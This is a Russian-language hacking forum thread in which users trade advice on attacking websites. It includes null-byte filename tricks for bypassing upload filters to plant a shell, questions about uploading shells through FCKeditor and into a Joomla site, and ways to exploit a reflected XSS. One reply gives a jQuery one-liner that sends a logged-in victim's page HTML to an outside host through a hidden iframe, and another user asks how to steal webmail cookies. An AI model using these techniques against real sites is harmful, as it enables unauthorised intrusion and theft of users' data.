Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. alexvrn

    alexvrn New Member

    Joined:
    13 Jun 2010
    Messages:
    2
    Likes Received:
    2
    Reputations:
    5
    При загрузки test.php%00.jpg => test-php-00.jpg
     
  2. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    попробуй test.php.php%00.png
     
  3. alexvrn

    alexvrn New Member

    Joined:
    13 Jun 2010
    Messages:
    2
    Likes Received:
    2
    Reputations:
    5
    test-php-php-00.png
     
  4. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    str_replace — Заменяет все вхождения строки поиска на строку замены
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    ты грузишь %00, а нужно NULL.
    P.S. Мой способ попробовал?
     
  6. alexvrn

    alexvrn New Member

    Joined:
    13 Jun 2010
    Messages:
    2
    Likes Received:
    2
    Reputations:
    5
    Да вообще не грузит
    P.S. Можно залить ли шелл в fckeditor 2.6.6 только .htaccess уже есть в папках? magic_quotes_gpc Off :)
     
  7. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    на сайте есть пассивка, можно ли вытащить сурс код странички залогиненого юзера(некий xsrf) и передать/записать на сервер
     
  8. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Возможности XSRF зависят от установленной системы (cms).
     
  9. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    самописный. без защиты. да и какая разница, если есть пассивная xss? я с jsом плохо знаком)
     
  10. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Пассивная/активная без разницы, ты должен понимать что javascript работает на стороне клиента. Если самописный движок ты должен будешь изучить его, чтобы провести XSRF. Там нету возможности украсть cookies?

    update: точнее - есть ли там вообща аутентификация, и работает ли она на основе cookies?
     
  11. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    есть конечно. и есть возможность воровать куки, естественно. только я преследую цель - сбор некоторых данных, а не кража аккаунтов. зачем изучать двиг, если нужно только взять сурс код?

    + я прекрасно знаю, про то, на чьей стороне работает js, именно из-за этого возможно получить страницу залогиненого юзера. Js спокойно работает в пределах атакуемого сайта, если у вас нет ничего по-существу вопроса, давайте не будем офтопить, спасибо.
    я преследую не чистый xsrf, а лишь "некое" подобие)
     
    #19471 justonline, 28 Feb 2012
    Last edited: 28 Feb 2012
  12. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Давай не умничай уже. Если тебе нужны сорсы движка, ты должен с помощью XSRF воспользоваться функцией этого движка, для нужных тебе операций, если такие функция вообще существуют. Если ты прекрасно знаешь на чей стороне работает javascript, то ты прекрасно должен знать на чей стороне работает PHP/ASP/PYTHON. Тоже мне умник.
     
  13. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    друг мой, ты меня очень недооцениваешь. улови логическую связь между "сурс страницы залогиненого юзера" и jsом.
    тут ни слова о исходниках движка.
    читайте, пожалста, вникая в текст. а не верхами.
     
  14. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    простите ради Бога)
    Все думал, что тебе нужны сорсы со сторoны сервера.
    В таком случаи советую копать в сторону:

    Code:
    document.getElementById('id').childNodes;
    document.getElementById('id').getElementsByTagNamе;
    Я как понимаю, тебе не будут нужны все сорсы этой страницы, а только определенная часть, поэтому можно воспользоватся javascript.
     
  15. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    402
    Likes Received:
    118
    Reputations:
    23
    если я правильно понил, что-то типа того (если на целевом сайте подключен jQuery, впрочем если нет, то через ту же пассивку его можно и подключить):
    Code:
    $('<iframe width="0" height="0" src="'+'http://your.site.com/src='+$('html').html()+' "></frame>').insertBefore('div:eq(0)');
     
  16. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    токен пытаешся чтоли вытащить? или полный сурс? Если есть возможность использовать XSS (именно на этой а не на другой странице сайта )то можно, если ксска на другой странице- и у тебя получится вытянуть токен- можеш на нобелевскую подавать :D (я сам когдато над этой задачей провел ниодну бесонную ночь)
     
  17. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    402
    Likes Received:
    118
    Reputations:
    23
    не очень понимаю в чем проблема, если та (другая страница) на том же домене, то можно открыть iframe с той страницей и также как выше я указал отправить html-содержимое
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    где-то тут м_скрипт говорил, что если есть пассивка, то токены не спасут) и говорил действовать через xmlrequest
     
  19. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Ты все еще не разборался с этим. Тебе что именно нужно будет вытащить, все сорсы или токены, или какие нибудь другие определенные элементы?

    Да кстати, M_script прав, токены не спасут от пассивки, если атакующий знает с каким названием токен находится в документе.
     
  20. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Вопрос номер раз:
    Есть ли где подробное описание, как использовать post xss (никак не могу разобраться... есть пассивка на почтовике, где в строке поиска нужно ввести скрипт и нажать enter - как на практике ей угнать кукисы?)

    Вопрос номер два как можно зaлить шелл (сайт на джyмлe 1.7)? Jskу нашел там вот что:
    Code:
    Possible secsitive directories - 1125
    Directories with EXECUTE permission enabled - 17
    Possible sensitive files - 15
    Directory backup check - 16
    File backup check - 274
    
     
Thread Status:
Not open for further replies.